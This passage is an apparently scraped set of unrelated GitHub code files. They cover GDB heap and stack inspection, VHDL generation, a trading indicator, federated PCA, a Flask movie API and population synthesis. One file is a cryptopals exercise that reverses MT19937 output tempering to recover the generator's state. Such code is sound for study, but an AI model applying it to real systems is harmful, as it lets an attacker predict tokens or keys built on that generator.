0\n self.heaps = []\n self.__memoryContainers = memoryContainers\n\n def loadHeaps (self):\n currHeapAddr = MallocMacros.heap_for_ptr(self.topChunkAddr)\n while True:\n print(\"\\t\\t({}) Heap (heap_info*){}\".format(len(self.heaps)+1, hex(currHeapAddr)))\n currHeap = MallocHeapInfo(self.__memoryContainers, self, currHeapAddr)\n self.heaps.append(currHeap)\n if currHeap.loAddr < self.loAddr:\n self.loAddr = currHeap.loAddr\n if currHeap.hiAddr > self.hiAddr:\n self.hiAddr = currHeap.hiAddr\n currHeapAddr = int(gdb.parse_and_eval(\"(unsigned long)((heap_info*){})->prev\".format(currHeapAddr)))\n if currHeapAddr == 0:\n break\n\n# ------------------------------------------------\n\n# See:\n# - https://code.woboq.org/userspace/glibc/malloc/malloc.c.html#5485\n# - https://sourceware.org/glibc/wiki/MallocInternals#Arenas_and_Heaps\nclass MallocHeapInfo:\n \n arenaObj = None # Type: MallocArenaInfo\n heap_infoAddr = 0 # Type: int (heap_info*)\n size = 0\n loAddr = 0\n hiAddr = 0\n\n __memoryContainers = None # Type: List[MemoryContainer]\n\n def __init__ (self, memoryContainers, arenaObj, heap_infoAddr):\n self.arenaObj = arenaObj\n self.heap_infoAddr = int(heap_infoAddr)\n self.size = int(gdb.parse_and_eval(\"((heap_info*){})->size\".format(heap_infoAddr)))\n self.loAddr = int(gdb.parse_and_eval(\"{}+sizeof(*(heap_info*)0)\".format(heap_infoAddr)))\n self.hiAddr = self.loAddr + self.size\n self.__memoryContainers = memoryContainers\n self.__memoryContainers.append(MemoryContainer(self.loAddr, self.hiAddr, self, \"Heap\"))\n\n# ------------------------------------------------\n# CALL STACK INFO\n# ------------------------------------------------\n\nclass GdbInferiorInfo:\n \n threads = [] # Type: List[GdbThreadInfo]\n \n __inferior = None # Type: gdb.Inferior\n __memoryContainers = None # Type: List[MemoryContainer]\n\n def __init__ (self, memoryContainers):\n self.threads = []\n self.__inferior = gdb.inferiors()[0]\n self.__memoryContainers = memoryContainers\n\n def loadThreads(self, loadCallStacks=True):\n gdbThreads = self.__inferior.threads()\n\n currThreadNum = 1\n for gdbThread in reversed(gdbThreads):\n # DEBUG\n if currThreadNum == 10: break\n # /DEBUG\n thread = GdbThreadInfo(self.__memoryContainers, gdbThread)\n print(\"\\t[{}/{}] {} {}\".format(currThreadNum, \\\n len(gdbThreads), \\\n thread.funcName, \\\n \"\".join(thread.threadInfo.split(' ')[4:6]).split(']')[0]))\n if loadCallStacks:\n thread.loadCallStack()\n self.threads.append(thread)\n currThreadNum += 1\n print(\"\\t[Done]\\n\")\n\n# ------------------------------------------------\n\nclass GdbThreadInfo:\n \n rip = 0\n funcName = \"\"\n threadInfo = \"\"\n callStack = None # Type: GdbCallStackInfo\n \n __gdbThread = None # Type: gdb.Thread\n __origGdbState = None # Type: GdbState\n __memoryContainers = None # Type: List[MemoryContainer]\n\n def __init__ (self, memoryContainers, gdbThread):\n self.__origGdbState = GdbState(gdb.selected_thread(), gdb.selected_frame())\n gdbThread.switch()\n lastGdbFrame = gdb.newest_frame()\n lastGdbFrame.select()\n self.rip = int(gdb.parse_and_eval(\"(long) $rip\"))\n self.threadInfo = gdb.execute(\"thread\", to_string=True).strip()\n self.funcName = str(lastGdbFrame.name()).strip()\n self.callStack = None\n self.__gdbThread = gdbThread\n self.__origGdbState.restore()\n self.__memoryContainers = memoryContainers\n\n def loadCallStack (self):\n self.callStack = GdbCallStackInfo(self.__memoryContainers, self.__origGdbState, self.__gdbThread)\n self.callStack.loadCallStackFrames()\n\n# ------------------------------------------------\n\n# NOTE: There are \"gaps\" between consecutive stack frames, which is where the\n# function arguments live as well as the saved pc and the return address.\n# Thus, for consecutive frames F1 and F0 (where F0 is newer),\n# rsp(F1) - rbp(F0) > 0. We can use this fact in order to distinguish\n# between local variables and arguments.\nclass GdbCallStackInfo:\n \n loAddr = 0\n hiAddr = 0\n frames = [] # Type: List[GdbCallStackFrameInfo]\n \n __gdbThread = None # Type: gdb.Thread\n __gdbLatestFrame = None # Type: gdb.Frame\n __origGdbState = None # Type: GdbState\n __memoryContainers = None # Type: List[MemoryContainer]\n\n def __init__ (self, memoryContainers, gdbState, gdbThread):\n self.__origGdbState = gdbState\n gdbThread.switch()\n self.__gdbThread = gdb.selected_thread()\n self.__gdbLatestFrame = gdb.selected_frame()\n self.__origGdbState.restore()\n self.__memoryContainers = memoryContainers\n\n def loadCallStackFrames (self):\n self.__gdbThread.switch()\n self.__gdbLatestFrame.select()\n\n currGdbFrame = gdb.selected_frame()\n isNewestFrame = True\n\n while True:\n currFrame = GdbCallStackFrameInfo(self.__memoryContainers, self.__origGdbState, currGdbFrame)\n self.frames.append(currFrame)\n currGdbFrame = currGdbFrame.older()\n isNewestFrame = False\n if currGdbFrame is None:\n break\n else:\n currGdbFrame.select()\n \n self.loAddr = self.frames[len(self.frames)-1].loAddr\n self.hiAddr = self.frames[0].hiAddr\n self.__memoryContainers.append(MemoryContainer(self.loAddr, self.hiAddr, self, \"Call_Stack\"))\n\n self.__origGdbState.restore()\n\n# ------------------------------------------------\n\nclass GdbCallStackFrameInfo:\n\n isGood = 0 # If this is True, it means that the loAddr & hiAddr are wonky.\n loAddr = 0\n hiAddr = 0\n rsp = 0\n rbp = 0\n arguments = set() # Type: set(gdb.Symbol)\n locals = set() # Type: set(gdb.Symbol)\n\n __gdbFrame = None # Type: gdb.Frame\n __memoryContainers = None # Type: List[MemoryContainer]\n\n def __init__ (self, memoryContainers, gdbState, gdbFrame):\n gdbFrame.select()\n self.__gdbFrame = gdbFrame\n self.rsp = int(gdb.parse_and_eval(\"(unsigned long)$rsp\"))\n self.rsp = int(gdb.parse_and_eval(\"(unsigned long)$rbp\"))\n frameBoundaries = self.__findFrameBoundaries(self.rsp, self.rbp)\n self.loAddr = frameBoundaries[0]\n self.hiAddr = frameBoundaries[1]\n self.arguments = set()\n self.locals = set()\n self.__memoryContainers = memoryContainers\n self.__memoryContainers.append(MemoryContainer(self.loAddr, self.hiAddr, self, \"Stack_Frame\"))\n gdbState.restore()\n\n # Traverse symbols until you find the ones that demark the frame boundaries.\n # See: https://stackoverflow.com/questions/30013252/get-all-global-variables-local-variables-in-gdbs-python-interface\n def __findFrameBoundaries (self, loAddrFallback, hiAddrFallback):\n\n gdbBlock = None\n loAddr = pow(2, 64)\n hiAddr = 0\n try:\n gdbBlock = self.__gdbFrame.block()\n # Determine the frame boundaries based on the addresses of local variables.\n for gdbSymbol in gdbBlock:\n if gdbSymbol.is_argument:\n self.arguments.add(gdbSymbol)\n elif gdbSymbol.is_variable:\n self.locals.add(gdbSymbol)\n # TODO: decide if gdbSymbol.is_argument should count as well as .is_variable.\n if gdbSymbol.is_variable:\n currSymbolAddr = 0\n currSymbolSize = 0\n try:\n currSymbolAddr = int(gdb.parse_and_eval(\"(unsigned long)&{}\".format(gdbSymbol.name)))\n currSymbolSize = int(gdb.parse_and_eval(\"sizeof({})\".format(gdbSymbol.name)))\n except:\n continue\n if currSymbolAddr < loAddr:\n loAddr = currSymbolAddr + currSymbolSize\n if currSymbolAddr > hiAddr:\n hiAddr = currSymbolAddr\n except:\n # If GDB can't find the block for this frame, we gracefully degrade\n # to using the fallback addresses supplied (probably rsp & rbp).\n loAddr = loAddrFallback\n hiAddr = hiAddrFallback\n\n # Check if the stack frame is too large & fall back if yes.\n # This will likely be the case because rbp is garbage or used as a general\n # purpose register.\n if abs(hiAddr - loAddr) > STACK_FRAME_MAXSIZE:\n loAddr = loAddrFallback\n hiAddr = hiAddrFallback\n \n # If the frame is still too large, use rsp as both loAddr and hiAddr.\n # TODO: Consider running a second pass over the frames array and use\n # the outer boundaries of adjacent frames as the inner boundaries for\n # the current one. I.e. frameA]<--frameB-->[frameC\n if abs(hiAddr - loAddr) > STACK_FRAME_MAXSIZE:\n loAddr = self.rsp\n hiAddr = self.rsp\n\n return [loAddr, hiAddr]\n\n# ------------------------------------------------\n\n# Since we have to switch to the current thread and newest frame, we have to\n# store the original thread and frame so we can cleanly restore GDB's state\n# to where the user left off.\nclass GdbState:\n\n __gdbThread = None # Type: gdb.Thread\n __gdbFrame = None # Type: gdb.Frame\n\n def __init__ (self, gdbThread, gdbFrame):\n self.__gdbThread = gdbThread\n self.__gdbFrame = gdbFrame\n\n def restore (self):\n self.__gdbThread.switch()\n self.__gdbFrame.select()\n\n# ------------------------------------------------\n# MISC.\n# ------------------------------------------------\n\n# Used to store the start and end of arenas, heaps, stacks, and individual stack frames.\nclass MemoryContainer:\n\n loAddr = 0\n hiAddr = 0\n obj = None # Type: [MallocArenaInfo,MallocHeapInfo,GdbCallStackInfo,GdbCallStackFrameInfo]\n objTypeName = \"\"\n\n def __init__ (self, loAddr, hiAddr, obj, objTypeName):\n self.loAddr = loAddr\n self.hiAddr = hiAddr\n self.obj = obj\n self.objTypeName = objTypeName\n\n# ------------------------------------------------\n# GDB COMMAND\n# ------------------------------------------------\n\nclass Gdb_UWMallocInfo (gdb.Command):\n\n __hasRun = 0\n __memoryContainers = [] # Type: List[MemoryContainer]\n __mallocInfo = None # Type: MallocInfo\n __inferiorInfo = None # Type: GdbInferiorInfo\n\n def __init__ (self):\n super (Gdb_UWMallocInfo, self).__init__(\"meminfo\", gdb.COMMAND_USER)\n\n def invoke (self, arg, from_tty):\n argv = arg.split()\n argc = len(argv)\n return self.__UWMallocInfo(argc, argv)\n\n def __UWMallocInfo (self, argc, argv):\n \n # Handle cmdline args.\n if argc > 0:\n if argv[0] == \"refresh\":\n self.__hasRun = 0\n elif argv[0] == \"address\":\n if argc > 1:\n expr = \"{}\".format(\" \".join(argv[1:]))\n memContDict = self.__findAddress(expr)\n if len(memContDict[\"theList\"]) == 0:\n print(\"The address \\\"{}\\\" could not be found inside any heap or stack.\\n\".format(memContDict[\"addr\"]) \\\n + \"If this is a variable, it may be allocted statically.\\n\" \\\n + \"If it is a class, function, or other symbol, it will not be located in a heap or stack.\")\n return\n print(\"The address \\\"{}\\\" was found in:\".format(memContDict[\"addr\"]))\n for memCont in memContDict[\"theList\"]:\n pass\n else:\n self.__printHelpText()\n elif argv[0] == \"containers\":\n if not self.__hasRun:\n self.__refreshData()\n print(\"Memory Containers:\")\n print(\"---\")\n memContNum = 1\n for memCont in self.__memoryContainers:\n print(\"[{}]\\t\\tType={:<32s} lowAddress={:<16s} highAddress={:<16s}\" \\\n .format(memContNum, memCont.objTypeName, hex(memCont.loAddr), hex(memCont.hiAddr)))\n memContNum += 1\n print(\"[Done]\")\n elif argv[0] == \"help\":\n self.__printHelpText()\n else:\n if not self.__hasRun:\n self.__refreshData()\n self.__prettyPrintSummary()\n\n def __loadMallocInfo (self):\n self.__mallocInfo = MallocInfo(self.__memoryContainers)\n self.__mallocInfo.loadArenas()\n\n def __loadThreadInfo (self):\n self.__inferiorInfo = GdbInferiorInfo(self.__memoryContainers)\n self.__inferiorInfo.loadThreads()\n\n def __findAddress (self, expr):\n if not self.__hasRun:\n self.__refreshData()\n addr = 0\n try:\n addr = int(gdb.parse_and_eval(\"(unsigned long)({})\".format(expr)))\n return self.__findInMemoryContainers(addr)\n except:\n return {\"addr\": 0, \"theList\": []}\n\n def __findInMemoryContainers (self, addr):\n memContList = []\n for memCont in self.__memoryContainers:\n if addr >= memCont.loAddr and addr <= memCont.hiAddr:\n memContList.append(memCont)\n return {\"addr\": addr, \"theList\": memContList}\n\n def __refreshData (self):\n self.__memoryContainers = []\n print(\"Loading heap info...\")\n self.__loadMallocInfo()\n print(\"Loading stack info...\")\n self.__loadThreadInfo()\n self.__hasRun = 1\n\n def __prettyPrintSummary (self):\n heapCount = 0\n for arena in self.__mallocInfo.arenas:\n heapCount += len(arena.heaps)\n \n frameCount = 0\n for thread in self.__inferiorInfo.threads:\n for frame in thread.callStack.frames:\n frameCount += 1\n \n print(\"Summary:\")\n print(\"---\")\n print(\"Heap Start Address (sbrk_base):\\t{}\".format(hex(self.__mallocInfo.sbrkBase)))\n print(\"Number of Arenas:\\t\\t{}\".format(len(self.__mallocInfo.arenas)))\n print(\"Number of Heaps:\\t\\t{}\".format(heapCount))\n print(\"Number of Threads:\\t\\t{}\".format(len(self.__inferiorInfo.threads)))\n print(\"Number of Stack Frames:\\t\\t{}\".format(frameCount))\n print(\"Number of Memory Containers:\\t{}\".format(len(self.__memoryContainers)))\n\n print(\"\")\n print(\"Type `meminfo help` for a list of commands.\")\n\n # TODO: Implement this.\n def _printHelpText (self):\n pass\n\n# ------------------------------------------------\n\nGdb_UWMallocInfo()\n\n# ================================================\n","repo_name":"thebel1/GDB-Scripts","sub_path":"meminfo.gdb.py","file_name":"meminfo.gdb.py","file_ext":"py","file_size_in_byte":23224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"35793553559","text":"import ast\nimport os,sys,inspect\n\n\nfrom HDPython.base import *\nfrom HDPython.HDPython_AST import *\nfrom HDPython.to_v_object import *\nfrom HDPython.primitive_type_converter import get_primitive_hdl_converter\n\n\n\ndef make_unique_list(list_in):\n uniqueList = []\n for ele in list_in:\n if ele not in uniqueList:\n uniqueList.append(ele)\n return uniqueList\n\n\ndef Fill_AST_Tree(package,SourceFile):\n if not SourceFile:\n return\n package.astTree = xgenAST(SourceFile)\n\n for x in package.PackageContent:\n if x._issubclass_(\"v_class\"):\n fun= package.astTree.extractFunctionsForClass(x ,package )\n x.__hdl_converter__.__ast_functions__ += fun\n\n if x._issubclass_(\"v_free_function_template\"):\n fun= package.astTree.extractFreeFunctions(x ,package )\n x.__hdl_converter__.__ast_functions__ += fun\n \n x.__hdl_converter__.__ast_functions__ = make_unique_list(x.__hdl_converter__.__ast_functions__)\n\n \nclass v_package(HDPython_base):\n def __init__(self, PackageName,PackageContent, sourceFile=None):\n super().__init__()\n self.__hdl_converter__ = get_primitive_hdl_converter(\"v_package\" )() \n \n s = isConverting2VHDL()\n set_isConverting2VHDL(True)\n proc = isProcess()\n set_isProcess(True)\n self.PackageName = PackageName\n self.PackageContent = PackageContent\n self.astTree = None\n self.astv_classes = None\n Fill_AST_Tree(self, sourceFile)\n\n set_isConverting2VHDL(s)\n set_isProcess(proc)\n \n \n\n\n\n\n\n \n\n def getName(self):\n return type(self).__name__\n def to_string(self):\n s = isConverting2VHDL()\n set_isConverting2VHDL(True)\n \n \n hdl.parse_file(self)\n \n \n ret = \"-- XGEN: Autogenerated File\\n\\n\"\n ret += hdl.def_includes(self, None, self)\n ret += \"\\n\\n\"\n p_header = hdl.def_packet_header(self,None, self)\n if p_header.strip():\n ret += \"package \" + self.PackageName + \" is \\n\\n\"\n ret += p_header\n ret += \"end \" + self.PackageName + \";\\n\\n\\n\"\n\n ret += \"package body \"+ self.PackageName +\" is\\n\\n\"\n ret += hdl.def_packet_body(self,None, self)\n ret += \"end \"+ self.PackageName +\";\\n\\n\"\n \n\n\n set_isConverting2VHDL(s)\n return ret\n\n def getInstantByName(self,SymbolName):\n for t in self.PackageContent:\n t = to_v_object(t)\n if t._type == SymbolName:\n return t\n\n\n return None\n\n def append(self, obj):\n self.PackageContent.append(obj)\n","repo_name":"HardwareDesignWithPython/HDPython","sub_path":"HDPython/v_Package.py","file_name":"v_Package.py","file_ext":"py","file_size_in_byte":2681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"36091444162","text":"# -*- coding: utf-8 -*-\nfrom pandas import Series\nfrom pandas_ta._typing import DictLike, Int\nfrom pandas_ta.maps import Imports\nfrom pandas_ta.utils import v_offset, v_pos_default, v_series, v_talib\n\n\ndef midpoint(\n close: Series, length: Int = None, talib: bool = None,\n offset: Int = None, **kwargs: DictLike\n) -> Series:\n \"\"\"Midpoint\n\n The Midpoint is the average of the rolling high and low of period length.\n\n Args:\n close (pd.Series): Series of 'close's\n length (int): It's period. Default: 2\n talib (bool): If TA Lib is installed and talib is True, Returns\n the TA Lib version. Default: True\n offset (int): How many periods to offset the result. Default: 0\n\n Kwargs:\n fillna (value, optional): pd.DataFrame.fillna(value)\n fill_method (value, optional): Type of fill method\n\n Returns:\n pd.Series: New feature generated.\n \"\"\"\n # Validate\n length = v_pos_default(length, 2)\n if \"min_periods\" in kwargs and kwargs[\"min_periods\"] is not None:\n min_periods = int(kwargs[\"min_periods\"])\n else:\n min_periods = length\n close = v_series(close, max(length, min_periods))\n\n if close is None:\n return\n\n mode_tal = v_talib(talib)\n offset = v_offset(offset)\n\n # Calculate\n if Imports[\"talib\"] and mode_tal:\n from talib import MIDPOINT\n midpoint = MIDPOINT(close, length)\n else:\n lowest = close.rolling(length, min_periods=min_periods).min()\n highest = close.rolling(length, min_periods=min_periods).max()\n midpoint = 0.5 * (lowest + highest)\n\n # Offset\n if offset != 0:\n midpoint = midpoint.shift(offset)\n\n # Fill\n if \"fillna\" in kwargs:\n midpoint.fillna(kwargs[\"fillna\"], inplace=True)\n if \"fill_method\" in kwargs:\n midpoint.fillna(method=kwargs[\"fill_method\"], inplace=True)\n\n # Name and Category\n midpoint.name = f\"MIDPOINT_{length}\"\n midpoint.category = \"overlap\"\n\n return midpoint\n","repo_name":"webclinic017/Project-Killer-Public","sub_path":"Data Aggregation Bot/LAYER_DO_NOT_PUSH/python/lib/python3.9/site-packages/pandas_ta/overlap/midpoint.py","file_name":"midpoint.py","file_ext":"py","file_size_in_byte":2000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"21611249296","text":"import logging\nlogging.basicConfig(level=logging.DEBUG)\nlogger = logging.getLogger(__name__)\n\ndef get_MSB(value, nbit):\n if nbit < 0:\n return 0\n return (value >> (31 - nbit)) & 1\n\ndef set_MSB(result, nbit, bit):\n return result | (bit << (31 - nbit))\n\ndef unshift_xor_right(value,shift):\n r = 0\n for nbit in xrange(32):\n r = set_MSB(\n result = r, \n nbit = nbit,\n bit = get_MSB(value, nbit) ^ get_MSB(r, nbit - shift)\n )\n return r\n\ndef get_LSB(value, nbit):\n if nbit < 0:\n return 0\n return (value >> nbit) & 1\n\ndef set_LSB(result, nbit, bit):\n return result | (bit << nbit)\n\ndef unshift_xor_left_mask(value, shift, mask):\n r = 0\n for nbit in xrange(32):\n r = set_LSB(\n result = r, \n nbit = nbit, \n bit = get_LSB(value, nbit) ^ (get_LSB(r, nbit - shift) & get_LSB(mask, nbit))\n )\n return r\n\ndef reverse_mersenne(value):\n value = unshift_xor_right(value,18)\n value = unshift_xor_left_mask(value,0xf,0xefc60000)\n value = unshift_xor_left_mask(value,0x7,0x9d2c5680)\n value = unshift_xor_right(value,0xb)\n return value\n","repo_name":"nnewsom/cryptopals","sub_path":"python2/lib/challenge23.py","file_name":"challenge23.py","file_ext":"py","file_size_in_byte":1170,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"} +{"seq_id":"22639722464","text":"move = object()\nmove_directions = {'n','e','s','w','north','east','south','west'}\nmove_words = {'move','walk','go'}\ngive_words = {'give', 'feed', 'present'}\nuse_words = {'eat', 'use', 'wear'}\nfight_words = {'fight', 'kill', 'hit', 'attack'}\nprepositions = {'up', 'down', 'on', 'under', 'in', 'at', 'to'}\n\ndrop_words = {'drop'}\nlook_words = {'look', 'inspect', 'examine'}\ninventory_names = {'inventory', 'possessions', 'belongings', 'bag'}\n\ndef action_prompt(inventory):\n \"\"\"Prompts for an action, splits it into words, and removes any prepositions.\n \n movement actions will be represented by the move token object in this module,\n followed by a one-letter direction.\n \"\"\"\n action = []\n while len(action) == 0:\n action = input('> ').lower().split()\n for prep in prepositions.intersection(action):\n action.remove(prep)\n if len(action) == 2 and (action[0] in look_words) and (action[1] in inventory_names):\n print(\"You have:\")\n for item, n in inventory.most_common():\n print(item, '(%d)' % n)\n return action_prompt(inventory)\n if len(action) == 2 and (action[0] in move_words) and (action[1] in move_directions):\n return (move, action[1][0])\n return action\n\ntake_words = {'pick', 'take', 'get', 'collect'}\n","repo_name":"gistfoundation/adventuregame-pysheff","sub_path":"agps/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1289,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"} +{"seq_id":"71844032871","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport os\r\n\r\nn = os.listdir(\r\n r'C:\\Users\\User\\Desktop\\alpha') # список файлов в папке (можно указать формат, но в данном случае в папке только файлы .png)\r\n\r\nw = np.zeros(168).reshape(8, 7, 3) # веса\r\n\r\n# обучающий вектор для нейрона\r\nD = []\r\nfor i in n:\r\n D.append(plt.imread(i))\r\n\r\n# истинные значения для нейрона\r\nY = np.array(\r\n [0, 1, 1, 1, 0, 1, 1, 1, 0, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 0, 1, 1, 1, 0, 1]) # 0 - гласная, 1 - согласная\r\nprint(Y)\r\nα = 0.2\r\nβ = -0.4\r\nσ = lambda x: 1 if x > 0 else 0\r\n\r\n\r\ndef f(x):\r\n s = β + np.sum(x * w)\r\n\r\n if σ(s) == 1:\r\n print('Cогласная')\r\n else:\r\n print('Гласная')\r\n return σ(s)\r\n\r\n\r\ndef train():\r\n global w\r\n _w = w.copy()\r\n for x, y in zip(D, Y): # для каждого файла(буквы) и каждого истинного значения\r\n w += α * (y - f(x)) * x\r\n print(w)\r\n return (w != _w).any()\r\n\r\n\r\nwhile train():\r\n print(w)\r\n\r\n###\r\n\r\nprint(f(plt.imread('E.png'))) # для удобства, вохдной сигнал берертся из директории.\r\n","repo_name":"PoturaevPetr/python-for-datascience","sub_path":"лабораторная №2.py","file_name":"лабораторная №2.py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"14025543632","text":"from flask import Blueprint, current_app, jsonify, redirect, request, url_for\nfrom .models import Movie\nfrom .serializer import MovieSchema\n\nbp_movies = Blueprint(\"movies\", __name__)\n\n\n@bp_movies.route(\"/list\", methods=[\"GET\"])\ndef list():\n result = Movie.query.all()\n return MovieSchema(many=True).jsonify(result), 200\n\n\n@bp_movies.route(\"/details/\", methods=[\"GET\"])\ndef detail(movie_id):\n ms = MovieSchema()\n result = Movie.query.filter(Movie.id == movie_id).first()\n if result:\n return ms.jsonify(result), 200\n response = {\"message\": f\"404 - ID {movie_id} not found\"}\n return jsonify(response), 404\n\n\n@bp_movies.route(\"/create\", methods=[\"POST\"])\ndef create():\n ms = MovieSchema()\n movie = ms.load(request.json)\n current_app.db.session.add(movie)\n current_app.db.session.commit()\n return ms.jsonify(movie), 201\n\n\n@bp_movies.route(\"/delete/\", methods=[\"DELETE\"])\ndef delete(movie_id):\n remove_movie = Movie.query.filter(Movie.id == movie_id).delete()\n current_app.db.session.commit()\n if remove_movie:\n response = {\"message\": f\"ID {movie_id} has been deleted\"}\n return jsonify(response), 200\n response = {\"message\": f\"404 - ID {movie_id} not found\"}\n return jsonify(response), 404\n\n\n@bp_movies.route(\"/update/\", methods=[\"PUT\"])\ndef update(movie_id):\n query = Movie.query.filter(Movie.id == movie_id).update(request.json)\n current_app.db.session.commit()\n if query:\n response = {\"message\": f\"200 - ID {movie_id} updated\"}\n return jsonify(response), 200\n response = {\"message\": f\"404 - ID {movie_id} not found\"}\n return jsonify(response), 404\n","repo_name":"dirijo/movie-recommendation","sub_path":"app/movies.py","file_name":"movies.py","file_ext":"py","file_size_in_byte":1689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"38294892912","text":"### imports\nimport numpy as np\nfrom numpy.core.fromnumeric import size\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport sys\nimport os\nimport math\nimport time\nsys.path.insert(1, os.path.join(sys.path[0], '..'))\nfrom io import BytesIO\nfrom v6_simpleNN_py.model import model\nfrom config_functions import get_datasets, get_config,get_full_dataset\nfrom comp_functions import average, scaffold\nfrom vantage6.client import Client\nfrom scipy.sparse.linalg import eigs\nfrom vantage6.tools.mock_client import ClientMockProtocol\n\ndatasets = get_datasets(\"MNIST_2class\", False, False)\n\nclient = ClientMockProtocol(\n datasets= datasets,\n module=\"v6_fedPCA_py\"\n### connect to server\n)\norganizations = client.get_organizations_in_my_collaboration()\norg_ids = [organization[\"id\"] for organization in organizations]\n\n\n\nnum_clients = 10 \nPCA_dims = 100\n\nprint(\"requesting metadata\")\nmetadata_task = client.create_new_task(\n input_ = {\n 'method' : 'get_metadata'\n },\n organization_ids=org_ids\n)\n\nres = np.array(client.get_results(task_id = metadata_task.get(\"id\")))\n#print(res)\n\nnum_cols = res[0][\"num_cols\"]\n\nlocal_means = np.zeros((num_clients, num_cols))\nlocal_vars = np.zeros((num_clients, num_cols))\ndataset_sizes = np.zeros(num_clients)\n\nfor i in range(num_clients): \n local_means[i,:] = res[i][\"local_mean\"]\n local_vars[i,:] = res[i][\"local_var\"]\n dataset_sizes[i] = res[i][\"num_rows\"]\n# get some random vals for the covariance matrix\ncov_rand = np.random.rand(num_cols,num_cols)\nw,v = eigs(cov_rand, k = PCA_dims)\n\nglobal_mean = average(local_means, dataset_sizes, None, None, None, use_sizes=True, use_imbalances=False)\nglobal_var = average(local_vars, dataset_sizes, None, None, None, use_sizes=True, use_imbalances=False)\n\ncov_partial_task = client.post_task(\n input_= {\n \"method\" : \"calc_cov_mat\",\n \"kwargs\" : {\n \"global_mean\" : global_mean,\n \"global_var\" : global_var,\n \"rows_to_calc\" : 5,\n \"iter_num\" : 0\n }\n },\n organization_ids=org_ids,\n )\n\ntask = client.create_new_task(\n input_ = {\n 'method' : 'do_PCA',\n 'kwargs' : {\n 'eigenvecs' : v.real,\n 'global_mean' : global_mean,\n 'global_var' : global_var\n }\n },\n organization_ids=org_ids\n)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"swiergarst/fedPCA","sub_path":"fedPCA_researcher-local.py","file_name":"fedPCA_researcher-local.py","file_ext":"py","file_size_in_byte":2517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"917073920","text":"#!/usr/bin/env python3\nimport pandas as pd\nimport random\nimport itertools\nimport functools\nfrom tqdm import tqdm\nimport geopandas as gpd\nfrom utils.utils import normalize_dpto_name, validate_dpto_indexes\nimport os\nimport re\nimport json\nimport numpy as np\nfrom collections import defaultdict\nimport struct\nfrom scipy.spatial import cKDTree\nimport math\n\nDATA_DIR = os.path.join('data', 'argentina')\nCENSO_HDF = os.path.join(DATA_DIR, 'censo-2010', 'censo.hdf5')\nPXLOC = os.path.join(DATA_DIR, 'datosgobar-densidad-poblacion', 'pais.geojson')\nSCHOOL_HDF = os.path.join(DATA_DIR, 'ministerio-educacion', 'matricula_y_secciones.hdf')\n\nclass Person:\n def __init__(self, id, family, edad, sexo, escuela, trabajo):\n self.id = id\n self.family = family\n self.edad = edad\n self.sexo = sexo\n self.escuela = escuela\n self.trabajo = trabajo\n\n def pack(self):\n struct_format = '>IB?II'\n return struct.pack(struct_format, self.family, int(self.edad), self.sexo == 'Mujer', self.escuela, self.trabajo)\n\nclass Family:\n def __init__(self, id, zone, dpto, prov):\n self.id = id\n self.zone = zone\n self.dpto = dpto\n self.prov = prov\n\n def pack(self):\n struct_format = '>HHH'\n return struct.pack(struct_format, self.zone, int(self.dpto), int(self.prov))\n\n\nclass Population:\n def __init__(self):\n self.people = []\n self.families = []\n self.nearest_zones = []\n self.nearest_densities = []\n self.geodata = None\n self.dpto_map = {}\n self.prov_map = {}\n\n def get_dpto_id(self, name):\n if name not in self.dpto_map:\n self.dpto_map[name] = len(self.dpto_map)\n return self.dpto_map[name]\n\n def get_prov_id(self, name):\n if name not in self.prov_map:\n self.prov_map[name] = len(self.prov_map)\n return self.prov_map[name]\n\n def calculate_ids(self):\n self.departments = [i[0] for i in sorted(self.dpto_map.items(), key=lambda i: i[1])]\n self.provinces = [i[0] for i in sorted(self.prov_map.items(), key=lambda i: i[1])]\n\n def to_dat(self, dat_file, json_file, geopackage_file):\n with open(json_file, 'w') as fout:\n json.dump({\n 'nearest_zones': self.nearest_zones,\n 'nearest_densities': self.nearest_densities,\n 'department_densities': self.department_densities,\n 'province_densities': self.province_densities,\n 'departaments': self.departments,\n 'provinces': self.provinces,\n }, fout)\n self.geodata.to_file(geopackage_file, driver=\"GPKG\")\n with open(dat_file, mode='wb') as fout:\n fout.write(struct.pack(\">I\", len(self.families)))\n for p in tqdm(self.families):\n fout.write(p.pack())\n fout.write(struct.pack(\">I\", len(self.people)))\n for p in tqdm(self.people):\n fout.write(p.pack())\n\n\nclass GenWithDistribution:\n def __init__(self, desired_cols, row, mx=None):\n self.cols = desired_cols\n self.cum_weights = list(itertools.accumulate([int(row[c]) for c in desired_cols]))\n self.precalc = []\n self.cur_index = 0\n def _remove_first_point(col):\n return col[col.find('.')+1:]\n def get(self, k=1):\n if self.cur_index+k > len(self.precalc):\n next_size = max(2*k, max(100, 2*len(self.precalc)))\n self.precalc = list(map(GenWithDistribution._remove_first_point,\n random.choices(self.cols, cum_weights = self.cum_weights, k = next_size)))\n self.cur_index = 0\n self.cur_index += k\n return self.precalc[self.cur_index - k: self.cur_index]\n\nclass SchoolIdGenerator:\n def __init__(self):\n self.cur_idx = 0\n def get_school(self):\n self.cur_idx += 1\n return self.cur_idx\n\nclass AlumnSchoolIdGenerator:\n def __init__(self, school_gen, mean):\n self.school_gen = school_gen\n try:\n self.mean = int(round(mean))\n except:\n self.mean = 100 #TODO: WHY I GET NAN\n self.cur_capacity = -1\n self.cur_size = 0\n self.cur_idx = 0\n\n def _gen_new_school(self):\n self.cur_capacity 